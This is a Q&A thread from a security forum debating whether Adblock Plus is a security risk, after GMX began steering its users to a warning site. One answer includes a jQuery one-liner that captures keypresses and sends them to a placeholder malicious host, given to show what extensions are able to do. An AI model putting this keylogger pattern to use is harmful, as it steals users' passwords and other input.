171

My email provider's website (http://www.gmx.de) recently started linking to the (German) site http://www.browsersicherheit.info/ which basically claims that due to its capabilities to modify a site's appearance, Adblock Plus (and others) might actually be abused for phishing. Here's a quote from that site plus its translation:

Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und können diese auch an Dritte weitergeben – auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

translated:

Such addons can access all your input in the browser and can also forward it to third parties - even your banking password. This can happen on all websites. Security mechanisms such as SSL cannot prevent that.

Ok, they mention other (pretty obviously crapware) addons, but is Adblock Plus really a security threat or do that site's operators simply use the opportunity to try and scare inexperienced users into viewing their ads again?

20
  • 36
    This boils down to: Don't run any applications you don't trust. If Adblock were evil, it could steal your login data. If any other executable you run were evil it could do so as well. Commented Feb 27, 2014 at 13:25
  • 4
    Just for humor's sake: Why don't you use Ghostery? ;-) Commented Feb 27, 2014 at 16:29
  • 19
    Can you clarify the question? Are you asking if Addons like Adblock could theoretically be a security risk, or are you asking if Adblock is currently a security risk? Commented Feb 27, 2014 at 17:17
  • 13
    I wonder how many users started using Adblock Plus after reading all the articles about this? Some entities should really consider the Streisand effect before starting a blackmail campaign.
    – ntoskrnl
    Commented Feb 28, 2014 at 15:38
  • 7
    @JeffMercado Isn't that a serious problem with Chrome's webstore then? I don't remember such BS happening at Mozilla... Commented Mar 1, 2014 at 10:14

9 Answers

224

It is not. This is a FUD (fear, uncertainty, and doubt) campaign by GMX because they want to display their ads. There is absolutely no security risk from the mentioned ad blockers. They added some crapware to the list to make it look more legitimate.

Of course such campaigns are very unusual, especially from such a big and well known company like GMX. Unfortunately, I have no English source at hand (because it's a German only campaign) but since you speak German you may want to read this article at heise.de.

Update #1: United Internet, the company behind GMX, received a lot of criticism for misleading customers by falsely claiming that there is a security risk on their PC. The Wall Street Journal (German edition) named the warnings displayed on GMX and the site they link to a "scare campaign".

Update #2: GMX now says that they will no longer display the link when you use ad blockers but will still display it if you use crapware that injects adverts. The list at the site http://www.browsersicherheit.info/ has been updated accordingly and now lists only a small collection of crapware. This list is by no means complete, so it is not a reliable source when you want to know if your browser has crapware installed. However, United Internet still maintains its position that they do not want users who visit their sites to use ad blockers and said they will develop other anti-blocking methods in the future (German source).

10
  • 13
    Who do you trust more? ABP (which is under constant scrutiny and would be steam rolled if it replaced mybank.com with something else) or Some Random German Company? COULD an addon be used for Evil Purposes? Of course... but without proof it's just blind accusations and FUD.
    – WernerCD
    Commented Feb 27, 2014 at 14:54
  • 24
    @WernerCD GMX is a major email provider, one of the top non-gmail providers. It's not "some random German company". And, of all the countries, a German company is the one you decide to mistrust?
    – Superbest
    Commented Feb 27, 2014 at 19:29
  • 17
@Superbest GMX and other German e-mail providers also run the "E-Mail made in Germany" campaign where they mislead customers into thinking that mails sent over their mail servers are safe from surveillance.
    – Andalur
    Commented Feb 27, 2014 at 19:33
  • 6
@Superbest Well... if it isn't an American company, then it is some other random company. .. ... I jest, I jest. But seriously, I would say the same for most companies - and would say the same if Comcast or Google told me to stop using ABP. You have to raise an eyebrow when a company that profits off of advertisements tells you to stop using an ad blocker.
    – WernerCD
    Commented Feb 27, 2014 at 19:54
  • 11
    It's really kind of dishonest to say that there's no risk. However, the risks are small enough that I do agree that this is nothing more than a FUD campaign.
    – josh3736
    Commented Feb 27, 2014 at 20:23
113

Update

After thinking it over, I have to agree with the other answers in that, despite the fact that it CAN access your data, Adblock is more likely to protect your privacy than invade it. The real risk are malicious ads that prompt you to install software on your computer. Adblock prevents these.

Below is the original, cautionary answer:

Yes, it totally is.

Adblock Plus is a browser extension/add-on developed by an independent developer. Adblock can access the DOM (document object model) on all pages.

The way AdBlock works is that it injects script into your browser, which searches the DOM, and then runs a hide() function on what it determines are ads.

That means AdBlock (and any Chrome extension with that permission) can access your DOM. Adblock cannot access JavaScript variables.

What does this mean?

If you are on a website with secure authentication, and there is a JavaScript object with something private like an AuthKey, you are safe. AdBlock cannot access JavaScript variables.

However, AdBlock CAN run code equivalent to this.

$(window).on('keypress', function(e){ $('html').append('<img src="http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode + '">'); });

Which essentially will route any keys you press to a remote server.

This can be used to steal your password which is even worse than stealing your token.

That Being Said, Is AdBlock itself Dangerous?

It seems to me that AdBlock is not overly dangerous as the developer has identified himself and it is used by millions of people. If it was doing the kind of trickiness as above, someone would have likely noticed and blown the whistle.

But don't think Chrome Extensions are totally safe. All of them can steal any data, as well as other malicious things.

What Else Can It Do?

A Chrome Extension can also perform the following security violations quite trivially...

  • Route the content of any email or page you read to a third-party source (if this email contains unencrypted login information, you are busted) If you can see it on the screen, so can any Chrome Extension, no questions asked.
  • Enter information into a field and press the submit button, for example, send an e-mail
  • If you leave your browser open, and the extension knows how, it can use your email interface (Gmail, Outlook) to send e-mail of its choosing to your contacts. This is trivial.
  • Change the script associated with any button, if that was originally put in with jQuery. For example, the button that sends your sign-in information to the server can be changed slightly to send that information to both the server and http://mymaliciousserver. This is trivial.

Update

It has been verified through discussion that AdBlock is open source. This should let you trust AdBlock more, but remember it is still capable of doing those things. I've reviewed the source and I can safely say I haven't any idea at all what's going on.

Source: I am a JavaScript and Chrome Extension developer.

21
  • 3
    If it's a Chrome Extension, and you allow it to access your data on all pages, then it can do all those things. Almost all Chrome Extensions ask for this permission, and with AdBlocker it's required even to work, if you think about it. Commented Feb 27, 2014 at 21:09
  • 3
    @itcouldevenbeaboat adblockplus.org/en/contribute-code Commented Feb 28, 2014 at 7:01
  • 6
@TobiasKienzer This is awesome. Excuse me while I fork AdBlock and begin my project of AdTeese, which replaces every ad with a sized pin-up of Dita von Teese. Commented Feb 28, 2014 at 14:22
  • 5
    "open-source" means nothing if the source you're looking at is not the same source as the extension uses. I have published the Chrome extension source viewer that allows one to view the real source of an extension (= the one that is going to be used when you install an extension). Of course, you have to trust that the extension does what it promises, i.e. display correct source code instead of some censored one. It all boils down to "only install software from publishers you trust").
    – Rob W
    Commented Feb 28, 2014 at 22:01
  • 4
    @TobiasKienzler It looks like Firefox has a stricter review process which seems to have a greater focus on manual reviews. Of course, it's not foolproof (and comes with longer update times while waiting for approval), but it might be more than Chrome does - Google's not very explicit about how they review.
    – Bob
    Commented Mar 2, 2014 at 4:25
56

This really comes down to an issue of trust. It is true that today, the AdBlock extension is safe. We know that it will not steal your data, even though—as the other answers point out—it has the technical ability to do so.

However, Chrome extensions are silently and automatically updated.

Do you trust that the developer of the AdBlock extension will not add malicious code? I personally do – with millions of users, malicious code would be noticed quickly and would undoubtedly be a career killer for the developer.

Even if you do trust the developer, there are still unlikely scenarios that could expose you:

For the paranoid, these issues could be mitigated by:

  • Only logging in to sensitive sites (i.e. banking) using Incognito mode (where extensions are disabled by default).
  • Disabling automatic extension updates, but you obviously lose a lot of convenience.

So while it is intellectually dishonest to say, "no, there is no risk," the risk is completely overblown by GMX. Just as I trust Google to give me a browser that does not steal my personal data, I trust the AdBlock developer to give me an extension that does not steal my data.

The risk of the extension being updated with malicious code is small enough that I don't worry about it, and if I did have the slightest concern, it's easy enough to disable the extension.

5
  • 11
    "Trust Google to give me a browser"... stunned by the fact that the words "Google" and "trust" are used in one sentence. Commented Feb 28, 2014 at 4:39
  • Good points indeed - the same applies for Firefox of course Commented Feb 28, 2014 at 7:06
  • 8
    Hahaha - I trust google to provide a browser that does steal my data, but at least I have a reasonable idea of all the things they will do with my data, and I have currently bought into that model and manage that data set accordingly.
    – Rory Alsop
    Commented Feb 28, 2014 at 9:12
  • 1
    Well... the browser itself won't steal your data; of course, the services that come with it are another story. Don't sign the browser into a Google account and uncheck all the boxes in the Privacy settings (or use Incognito), and you won't leak anything to Google. The same applies with Firefox and IE.
    – josh3736
    Commented Feb 28, 2014 at 16:32
  • There have already been cases where developers of chrome extensions have sold their IP to another party who has not had the same ethics, security precautions etc. This is not to say AdBlock is a risk. It just emphasises that when you use an extension, you need to recognise that the situation can change and something you trusted and were confident about may end up evolving into something less trustworthy.
    – Tim X
    Commented Dec 11, 2014 at 22:43
43

All software is a security risk, but in this case their claim is misleading.

Just like all advice is potentially bad and all transactions are potentially fraudulent. "Risk" just means your security isn't guaranteed, which is true in 100% of cases.

But in the case of AdBlock Plus, the software is well-understood and developed by a team that has a track record of protecting the interests of its users. Plus it's open-source, so the source code is available for you to examine yourself for any security issues. So in this case, the risk is minimal; trivial even.

Instead, GMX is using a truism ("software is always risky") to suggest that this software is dangerous, which is misleading at best, and possibly defamatory. It's like a restaurant owner handing out leaflets saying his competitors could be poisoning their own food. Technically it's true, since you said "could be" instead of "are", but the action is fundamentally dishonest nonetheless.

1
  • 3
    I just wish they were more honest as in "Please support our service by viewing our ads. Or else." Commented Feb 28, 2014 at 7:07
21

Just an observation - I tend to promote ad blockers especially for my less savvy friends and associates - precisely because it reduces security threats. How? Because much of the most malicious content on the web comes in the form of a misleading advertisement like "click here to make your pc faster"... These largely disappear with an ad blocker.

4
  • 4
    followed by the "you seem to have a virus, download 'anti'-virus now" - best reason why someone clicked this: "It didn't go away after clicking 'no', so I chose 'ok'" m-/ Commented Feb 28, 2014 at 9:13
  • 4
    If a site said "Please don't use an ad blocker on this site; they help us pay the bills and we promise not to sell ad space to any malicious content." I'd feel obliged to turn my ad blocker off on that site.
    – Wyrmwood
    Commented Feb 28, 2014 at 19:44
  • 2
    Exactly, that's what I do on the entire SE network Commented Mar 1, 2014 at 9:17
  • I'm not using adblockers, as I know it helps pay the bills on most sites I'm visiting. I would love to have a partial ad-blocker, which would only block ads that are known to be malicious. I'm also fine with obtrusive ads (flash, gif, videos, etc.), that are not malicious, just trying to grab attention, so Adblock Plus's lesser filter is still not okay for me.
    – SztupY
    Commented Mar 4, 2014 at 20:30
9

Adblock (as other extensions and, for that matter, browser developers) has the technical ability to get a lot of your data, and you have all the risks commonly associated with running third-party applications - namely, that the vendor can be malicious, and there may be bugs in their software that break your security.

That being said, I'd consider AdBlock as a defence against phishing. A lot of questionable software gets pushed to users through ads masquerading as something else - i.e., a site offers some item that a user wants, but has an ad that looks like a download button, and delivers some adware/malware product instead of the actual content on site, and such 'accidentally' downloaded malware is a serious security risk. Similarly, there have been incidents of mass consumer attacks by running an ad banner containing a zeroday exploit, which would cause the exploit to appear on respected, well trusted sites.

For company-wide security practices, it may make sense to require AdBlock and install it by default on every workstation - since it is especially useful to protect the inexperienced users who wouldn't install it themselves. This would cause a risk by trusting one more software product, but would be a net positive for everyday security.

2
  • 1
    interesting point, though for company-wide use I'd consider using a local fork that gets updated only after a sufficiently thorough review of the changes made Commented Feb 28, 2014 at 9:12
  • 1
    Yes, a trusted&verified fixed version is great - again, that's just treating adblock risks exactly as you should treat any other commonly installed software and its upgrades.
    – Peteris
    Commented Feb 28, 2014 at 12:38
8

The way this information is spread by United Internet is misleading (I am trying hard to avoid saying "libel"). The allegation as it stands is clearly wrong by all objective means, and the presentation is defamatory.

Of course, in principle, one has to admit that Adblock (Plus) is a potential security risk. Whether this risk warrants a reasonable concern is another thing.

Adblock (Plus) might be a security risk for three reasons:

  1. It is software that runs on your computer, which could, like all software, in principle do almost anything. Including showing false information or stealing your data.
  2. It does modify web page contents, that is what blocking ads is about. Certainly, a software which is well-known to modify the contents of web pages could modify the contents in a malicious way and go unnoticed much easier than another software.
  3. It performs this task by matching a downloadable list of regular expressions from a range of (uncontrolled/unknown) third parties, such as EasyList.

So, if you are in ultra-paranoia mode, you might fear that either someone at EasyList (or another filter list provider) modifies the filter list so they do something malicious, or a hacker hijacks the site. Your Adblock Plus addon would presumably download the malicious list during its daily/weekly update without knowing and without a means of verification (there is a checksum that can be embedded, but this only protects from accidental corruption, not malicious modification).
As a result, such a malicious block list could in theory cause the addon to do "evil things".

Luckily, apart from JS exploits, there is not too much harm that could realistically be done via this attack vector due to the way Adblock works (it will match an arbitrary regex, but it won't do arbitrary substitutions, so hiding some elements it shouldn't hide or letting some ads through is pretty much the worst possible case).
On the other hand, a JS exploit could be used against you without Adblock Plus running in the first place.

Also, obviously, like any third party software (including Firefox or Chrome itself!) the Adblock Plus addon itself could steal your data. All you can say at the present time is that so far this has not happened.
Then again, almost all of the big commercial players in the business are doing untrustworthy things on a daily basis, to which nobody objects.

Now you have to ask yourself how likely it is that Adblock Plus will indeed steal user data, and how likely it is that such a thing would go undetected for longer than a day or two on a widely-deployed open-source project.

Frankly, if you believe that this is a serious and realistic threat which is likely to affect you, then you must also believe that Microsoft in collaboration with the NSA already builds identity theft functionality right into Windows and that every computer has a secret "kill switch" which the US DoD can activate at will (that too, is in principle possible, and it's actually more likely to be true than the author of Adblock stealing your savings).

You should not trust GMX either in this case, since they will (note the wording, will, not may) share all your personal data and traffic information in a malicious and unethical way with other parties (at least with US agencies, due to Schröder's 2001 treaty, but you have no way of telling with whom else).
You also shouldn't trust 1&1 (another member of United Internet) because they will share your personal data with who-knows-whom (being a US-based company). Nor Google, nor the other half of the internet for that matter.

On the other hand, Adblock Plus has demonstrably prevented malware from being installed on users' computers in the past.

0
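The answer above notes that the checksum a filter list can embed only catches accidental corruption, while a pinned, out-of-band hash would catch a modified list. The following illustration (added here, not Adblock Plus or EasyList code) shows the difference on a constructed sample list; the "! Checksum:" line format and the normalisation steps are assumptions modelled on that list format, and the hypothetical helper names are mine.

```python
"""Why an embedded, unkeyed filter-list checksum does not stop malicious modification.

Added illustration, not Adblock Plus code. The '! Checksum:' line and the
normalisation steps are assumptions about the list format; the sample list below
is constructed, not real EasyList content.
"""
import base64
import hashlib
import re

# Assumed header line carrying the embedded checksum, e.g. "! Checksum: <base64 md5>".
CHECKSUM_RE = re.compile(r"^\s*!\s*checksum[\s\-:]+([\w\+/=]+).*\n", re.I | re.M)


def normalise(text: str) -> str:
    # Assumed normalisation: unify line endings, drop the checksum line, drop empty lines.
    text = text.replace("\r\n", "\n").replace("\r", "\n")
    text = CHECKSUM_RE.sub("", text)
    return re.sub(r"\n+", "\n", text)


def embedded_checksum(text: str) -> str:
    # Unkeyed MD5 of the normalised list, base64 without '=' padding.
    digest = hashlib.md5(normalise(text).encode("utf-8")).digest()
    return base64.b64encode(digest).decode("ascii").rstrip("=")


def checksum_matches(text: str) -> bool:
    # What a client can verify from the list alone: only that it was not corrupted in transit.
    m = CHECKSUM_RE.search(text)
    return bool(m) and m.group(1).rstrip("=") == embedded_checksum(text)


def with_checksum(body: str) -> str:
    return "! Checksum: " + embedded_checksum(body) + "\n" + body


def pinned_hash(text: str) -> str:
    # What a reviewer records out of band after auditing a list version (hypothetical practice).
    return hashlib.sha256(normalise(text).encode("utf-8")).hexdigest()


def tamper(text: str, extra_rule: str) -> str:
    # A modified list: whoever edits it just recomputes the unkeyed checksum.
    body = CHECKSUM_RE.sub("", text).rstrip("\n") + "\n" + extra_rule + "\n"
    return with_checksum(body)


# Constructed sample list (not EasyList content).
ORIGINAL = with_checksum(
    "[Adblock Plus 2.0]\n"
    "! Title: Sample list\n"
    "||ads.example.com^\n"
    "example.org##.banner-ad\n"
)
REVIEWED_HASH = pinned_hash(ORIGINAL)  # stored by the reviewer, never inside the list
# Element-hiding rule of the "hides something it shouldn't" kind the answer describes.
TAMPERED = tamper(ORIGINAL, "bank.example##.security-notice")


def verdicts() -> dict:
    return {
        "original_checksum_ok": checksum_matches(ORIGINAL),   # True
        "tampered_checksum_ok": checksum_matches(TAMPERED),   # True: checksum was recomputed
        "tampered_pin_ok": pinned_hash(TAMPERED) == REVIEWED_HASH,  # False: the pin catches it
    }


if __name__ == "__main__":
    print(verdicts())
```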
3

The other answers forget to mention the issue aside from trust: That adblock is modifying pages you visit. This and having to trust more developers is why I have never used ad blocking software/browser plugins, and strongly recommend against it.

It is well known that websites depend on all kinds of fragile invariants for security. For example, just look at the ways clickjacking has been addressed in the past. There is nothing stopping adblock from mistakenly violating an invariant that the site depends on for security.

Also adblock and other ad blocking software decrease anonymity. An adversary can either make you run code to browse the DOM tree and look for missing parts / alterations, or passively observe that you aren't making certain requests to fetch ad-related content (some of which may be hosted on the site itself, making it a possible adversary).

1
  • How many people use Adblock* with EasyList and no other filters?
    – curiousguy
    Commented Mar 2, 2014 at 2:21
2

Something no-one has mentioned here is that Adblock Plus, along with almost all other browsers and extensions, can be updated remotely. This means there must be a backdoor in the program even if it is locked down to specific "trustworthy" update URLs. This could be interpreted as spyware, but spyware is a somewhat abstract term.

It's true that most people have said it is not safe, as it has permissions to read and send data, although it's widely accepted that Adblock Plus in particular is not malicious. Despite for the most part being open source (Adblock included), browser software and extensions are only as secure as the update URLs, for which there is no way of knowing how secure they actually are, as the code for these services is remote and therefore not accessible.

Obviously no software or server can be 100% secure due to entropy and having users, but to obtain the highest possible security you should study the source code, always build from source and disable automatic updating. Like with all software, browsers and extensions are only as secure as the user makes them.

2
  • "Something no-one has mentioned here is that Adblock plus along almost all other browsers and extensions can be updated remotely." Read again; this has been mentioned.
    – Luc
    Commented May 17, 2014 at 10:02
  • Oh sorry, my mistake. I assumed so since your post is more towards the bottom than the one that originally mentioned it (oftentimes posts are very roughly in chronological order), but of course I should have checked. I stand corrected :)
    – Luc
    Commented May 17, 2014 at 23:31